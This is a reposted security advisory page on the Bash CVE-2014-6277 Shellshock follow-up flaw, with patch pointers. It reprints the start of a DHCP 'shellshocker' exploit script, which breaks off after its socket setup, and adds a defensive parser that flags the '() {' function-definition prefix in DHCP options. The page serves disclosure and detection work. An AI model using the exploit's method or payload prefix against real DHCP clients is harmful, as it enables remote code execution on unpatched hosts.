GNU Bash Incomplete Fix Remote Code Execution Vulnerability (CVE

Published: 2014-09-27
Updated: 2014-10-08

Affected systems:
GNU Bash <= 4.3 bash43-026
Description:
BUGTRAQ ID: 70165
CVE(CAN) ID: CVE-2014-6277

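Bash is a Unix shell written in 1987 by Brian Fox for the GNU Project.

GNU Bash 4.3 bash43-026 and earlier versions do not correctly parse function definitions in the values of environment variables. A remote attacker can exploit this through a crafted environment to execute arbitrary code or cause a denial of service. This vulnerability stems from the incomplete fix for CVE-2014-6271 and CVE-2014-7169.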

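Gitlab-shell is affected by the Bash CVE-2014-6271 vulnerability

Linux hit by another security vulnerability: Bash flaw more serious than Heartbleed

The fix is to upgrade Bash; see this article:

Linux Bash security vulnerability fix

<*Source: Michal Zalewski (lcamtuf@echelon.pl)

  Link:
 *>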

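Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!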
#!/usr/bin/python
# Exploit Title: dhclient shellshocker
# Google Dork: n/a
# Date: 10/1/14
# Exploit Author: @0x00string
# Vendor Homepage: gnu.org
# Software Link:
# Version: 4.3.11
# Tested on: Ubuntu 14.04.1
# CVE : CVE-2014-6277,CVE-2014-6278,CVE-2014-7169,CVE-2014-7186,CVE-2014-7187

# this buddy listens for clients performing a DISCOVER, a later version will exploit periodic REQUESTs, which can sometimes be prompted by causing IP conflicts
# once a broadcast DISCOVER packet has been detected, the XID, MAC and requested IP are pulled from the pack and a corresponding OFFER and ACK are generated and pushed out
# The client is expected to reject the offer in preference of their known DHCP server, but will still process the packet, triggering the vulnerability.
# can use option 114, 56 or 61, though is hardcoded to use 114 as this is merely a quick and dirty example.

import socket, struct

def HexToByte( hexStr ):
    # Convert a hex string (spaces between bytes allowed) into a byte string
    b = []
    h = ''.join( hexStr.split(" ") )
    for i in range(0, len(h), 2):
        b.append( chr( int (h[i:i+2], 16 ) ) )
    return ''.join( b )

rport = 68  # DHCP client port
lport = 67  # DHCP server port

bsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

bsock.bind(("<broadcast>", lport))

while True:
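
Added example (not part of the original page or of the exploit author's script): a defensive check that walks the options field of a captured DHCP packet and flags any option value carrying the "() {" prefix that pre-patch bash treats as an exported function definition, which is the delivery path the script's comments describe for option 114. The function names, the constructed sample packets, and the choice to match the prefix anywhere in the value are assumptions of this example.

```python
import struct

BOOTP_HEADER_LEN = 236              # fixed BOOTP header that precedes the options
MAGIC_COOKIE = b"\x63\x82\x53\x63"  # marks the start of the DHCP options field
FUNC_PREFIX = b"() {"               # leading bytes bash treats as an exported function


def parse_options(packet):
    """Yield (code, value) for every DHCP option; ValueError on malformed input."""
    start = BOOTP_HEADER_LEN + len(MAGIC_COOKIE)
    if packet[BOOTP_HEADER_LEN:start] != MAGIC_COOKIE:
        raise ValueError("no DHCP magic cookie")
    i = start
    while i < len(packet):
        code = packet[i]
        if code == 0:        # pad option: single byte, no length field
            i += 1
            continue
        if code == 255:      # end option
            return
        if i + 1 >= len(packet):
            raise ValueError("truncated option header")
        length = packet[i + 1]
        value = packet[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated option value")
        yield code, value
        i += 2 + length


def suspicious_options(packet):
    """Return the options whose value contains a bash function-definition prefix."""
    return [(c, v) for c, v in parse_options(packet) if FUNC_PREFIX in v]


def build_packet(options):
    """Constructed test input: a BOOTREPLY whose header is zero apart from op/htype/hlen/xid."""
    header = struct.pack("!BBBBIHH16s16s64s128s", 2, 1, 6, 0, 0x12345678, 0, 0,
                         b"", b"", b"", b"")
    body = b"".join(bytes([c, len(v)]) + v for c, v in options)
    return header + MAGIC_COOKIE + body + b"\xff"


# Constructed samples: option 53 = message type (2 = OFFER), 51 = lease time,
# 114 = the option the script on this page hardcodes. The value is a bare no-op body.
CLEAN = build_packet([(53, b"\x02"), (51, struct.pack("!I", 3600))])
FLAGGED = build_packet([(53, b"\x02"), (114, b"() { :; }")])

if __name__ == "__main__":
    for name, pkt in (("clean", CLEAN), ("flagged", FLAGGED)):
        print(name, suspicious_options(pkt))
```

Bash only interprets the prefix at the very start of a variable's value; matching it anywhere in the option is a deliberately broader detection rule.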

Content copyright notice: unless otherwise noted, all articles are original to this site.

When reposting, cite the source: http://www.heiqu.com/b1d0dd3d31fb6a88e7ea731ad851b2d8.html